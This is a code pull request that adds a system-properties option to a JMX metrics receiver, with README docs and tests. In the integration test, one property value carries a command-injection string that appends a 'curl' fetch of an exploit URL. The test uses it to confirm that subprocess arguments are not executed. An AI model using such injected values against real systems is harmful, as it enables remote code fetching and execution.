### PR TITLE
jmx receiver: allow setting system properties

### DIFF
--- a/receiver/jmxreceiver/README.md
+++ b/receiver/jmxreceiver/README.md
@@ -35,6 +35,10 @@ receivers:
     username: my_jmx_username
     # determined by the environment variable value
     password: $MY_JMX_PASSWORD
+    # will be set as system properties for the underlying java command
+    properties:
+      otel.resource.attributes: my.attr=my.value,my.other.attr=my.other.value
+      some.system.property: some.system.property.value
 ```
 
 ### jar_path (default: `/opt/opentelemetry-java-contrib-jmx-metrics.jar`)
@@ -84,6 +88,11 @@ Corresponds to the `otel.jmx.username` property.
 The password to use for JMX authentication.
 
 Corresponds to the `otel.jmx.password` property.
+
+### properties
+
+A map of property names to values to be used as system properties set as command line options
+(e.g. `-Dproperty.name=property.value`).
 
 ### otlp.endpoint (default: `0.0.0.0:<random open port>`)
 

--- a/receiver/jmxreceiver/config_test.go
+++ b/receiver/jmxreceiver/config_test.go
@@ -77,7 +77,16 @@ func TestLoadConfig(t *testing.T) {
 			TruststorePassword: "mytruststorepassword",
 			RemoteProfile:      "myremoteprofile",
 			Realm:              "myrealm",
+			Properties: map[string]string{
+				"property.one": "value.one",
+				"property.two": "value.two.a=value.two.b,value.two.c=value.two.d",
+			},
 		}, r1)
+
+	assert.Equal(
+		t, []string{"-Dproperty.one=value.one", "-Dproperty.two=value.two.a=value.two.b,value.two.c=value.two.d"},
+		r1.parseProperties(),
+	)
 
 	r2 := cfg.Receivers[config.NewIDWithName(typeStr, "missingendpoint")].(*Config)
 	require.NoError(t, configcheck.ValidateConfig(r2))

--- a/receiver/jmxreceiver/integration_test.go
+++ b/receiver/jmxreceiver/integration_test.go
@@ -150,7 +150,17 @@ func (suite *JMXIntegrationSuite) TestJMXReceiverHappyPath() {
 		},
 		Password: "cassandra",
 		Username: "cassandra",
+		Properties: map[string]string{
+			// should be used by Autoconfigure to set resource attributes
+			"otel.resource.attributes": "myattr=myvalue,myotherattr=myothervalue",
+			// test script sets dp labels from these system property values
+			"my.label.name": "mylabel", "my.label.value": "myvalue",
+			"my.other.label.name": "myotherlabel", "my.other.label.value": "myothervalue",
+			// confirmation that arbitrary content isn't executed by subprocess
+			"one": "two & exec curl http://example.com/exploit && exit 123",
+		},
 	}
+	require.NoError(t, cfg.validate())
 
 	consumer := new(consumertest.MetricsSink)
 	require.NotNil(t, consumer)
@@ -189,6 +199,14 @@ func (suite *JMXIntegrationSuite) TestJMXReceiverHappyPath() {
 		require.True(t, ok)
 		require.NotEmpty(t, version.StringVal())
 
+		customAttr, ok := attributes.Get("myattr")
+		require.True(t, ok)
+		require.Equal(t, "myvalue", customAttr.StringVal())
+
+		anotherCustomAttr, ok := attributes.Get("myotherattr")
+		require.True(t, ok)
+		require.Equal(t, "myothervalue", anotherCustomAttr.StringVal())
+
 		ilm := rm.InstrumentationLibraryMetrics().At(0)
 		require.Equal(t, "io.opentelemetry.contrib.jmxmetrics", ilm.InstrumentationLibrary().Name())
 		require.Equal(t, "1.0.0-alpha", ilm.InstrumentationLibrary().Version())
@@ -203,6 +221,16 @@ func (suite *JMXIntegrationSuite) TestJMXReceiverHappyPath() {
 		require.Equal(t, pdata.MetricDataTypeIntSum, met.DataType())
 		sum := met.IntSum()
 		require.False(t, sum.IsMonotonic())
+
+		// These labels are determined by system properties
+		labels := sum.DataPoints().At(0).LabelsMap()
+		customLabel, ok := labels.Get("mylabel")
+		require.True(t, ok)
+		require.Equal(t, "myvalue", customLabel)
+
+		anotherCustomLabel, ok := labels.Get("myotherlabel")
+		require.True(t, ok)
+		require.Equal(t, "myothervalue", anotherCustomLabel)
 
 		return true
 	}, 30*time.Second, 100*time.Millisecond, getJavaStdout(receiver))

--- a/receiver/jmxreceiver/receiver.go
+++ b/receiver/jmxreceiver/receiver.go
@@ -67,9 +67,10 @@ func (jmx *jmxMetricReceiver) Start(ctx context.Context, host component.Host) (e
 	if err != nil {
 		return err
 	}
+
 	subprocessConfig := subprocess.Config{
 		ExecutablePath: "java",
-		Args:           []string{"-Dorg.slf4j.simpleLogger.defaultLogLevel=debug", "-jar", jmx.config.JARPath, "-config", "-"},
+		Args:           append(jmx.config.parseProperties(), "-Dorg.slf4j.simpleLogger.defaultLogLevel=info", "-jar", jmx.config.JARPath, "-config", "-"),
 		StdInContents:  javaConfig,
 	}
 

--- a/receiver/jmxreceiver/testdata/config.yaml
+++ b/receiver/jmxreceiver/testdata/config.yaml
@@ -20,6 +20,9 @@ receivers:
     truststore_password: mytruststorepassword
     remote_profile: myremoteprofile
     realm: myrealm
+    properties:
+      property.one: value.one
+      property.two: value.two.a=value.two.b,value.two.c=value.two.d
   jmx/missingendpoint:
     groovy_script: mygroovyscriptpath
   jmx/missinggroovy:

--- a/receiver/jmxreceiver/testdata/script.groovy
+++ b/receiver/jmxreceiver/testdata/script.groovy
@@ -23,5 +23,9 @@ if (loadMatches.size() > 0) {
         "cassandra.storage.load",
         "Size, in bytes, of the on disk data size this node manages",
         "By"
-    ).add(load.Count, Labels.of("myKey", "myVal"))
+    ).add(load.Count, Labels.of(
+        "myKey", "myVal",
+        System.properties["my.label.name"], System.properties["my.label.value"],
+        System.properties["my.other.label.name"], System.properties["my.other.label.value"],
+    ))
 }


### PR DESCRIPTION
**Description:**
Adding a feature - These changes add a new `properties` config option to allow specifying desired system properties for the groovy metric gathering script environment.

**Link to tracking Issue:**
https://github.com/open-telemetry/opentelemetry-java-contrib/issues/33

**Testing:**
Unit and integration tests added/updated.

**Documentation:**
Config field documentation added.